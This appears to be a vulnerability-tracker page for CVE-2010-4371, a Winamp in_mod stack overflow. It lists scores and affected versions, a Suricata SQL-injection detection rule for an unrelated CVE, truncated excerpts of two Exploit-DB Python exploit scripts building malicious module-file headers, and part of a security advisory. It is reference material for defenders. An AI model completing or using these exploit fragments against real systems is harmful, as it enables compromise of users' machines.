CVE-2010-4371
Published 2010-12-02
CVE-2010-4371: Buffer overflow in the in_mod plugin in Winamp before 5.6 allows remote attackers to have an unspecified impact via vectors related to the comment box.
Priority P3 · 50 · critical · 9.3 CVSS 2.0
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.10% (92.5th percentile)
Affected
57 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | <= 5.581 | — |
Suricata
ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
suricata·2010-07-30·CVSS 7.5
CVE-2008-4371 [HIGH] ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/articles.php?"; nocase; content:"aIDS="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2008-4371; reference:url,secunia.com/advisories/31816/; reference:url,milw0rm.com/exploits/6409; classtype:web-application-attack; sid:2009747; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2024_03_06, mitre_t
Exploit-DB
Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow
exploitdb·2010-10-25
CVE-2010-4371 Winamp 5.5.8.2985 (in_mod plugin) - Local Stack Overflow
---
#!/usr/bin/python
# Pwn And Beans by Mighty-D and 7eK presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# A Script Kiddie Friendly Production
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# An improvement to http://www.exploit-db.com/exploits/15287/
# POC by fdisk
# MemMove Idea from: A.Gomez
# Exploit by Mighty-D and 7eK
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# EDB-Team
# UdeA GITA SSI
import struct
def fill(shellcode):
    nopsFaltantes = ((len(shellcode) / 40)+1)*40 - len(shellcode)
    shellcode += '\x90'*nopsFaltantes
    return shellcode
header = "\x4D\x54\x4D\x10\x63\x6C\x69
Exploit-DB
Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow
exploitdb·2010-10-19
CVE-2010-4371 Winamp 5.5.8 (in_mod plugin) - Local Stack Overflow
---
#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C"
Exploit-DB
Winamp 5.5.8.2985 - Multiple Buffer Overflows
exploitdb·2010-10-13
CVE-2010-4371 Winamp 5.5.8.2985 - Multiple Buffer Overflows
---
Source: http://aluigi.org/adv/winamp_1-adv.txt
#######################################################################
Luigi Auriemma
Application: Winamp
http://www.winamp.com
Versions: > 3);
C] integer overflow in in_midi
The in_midi plugin is affected by a heap overflow during the handling
of the hmp files (a format used in some old DOS games) where a
variable-length 32bit value is used for the copying of data with
memcpy() from the attacker's data to a heap buffer which has not been
reallocated for matching the needed size due to an integer overflow.
Doesn't seem possible to control the code execution.
D] buffer-overflow in in_mod
The in_mod plugin is affected by a stack overflow which happens during
the handling of a malforme
No writeups or analysis indexed.
References:
http://forums.winamp.com/showthread.php?t=324322
http://forums.winamp.com/showthread.php?threadid=159785
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12309
Published: 2010-12-02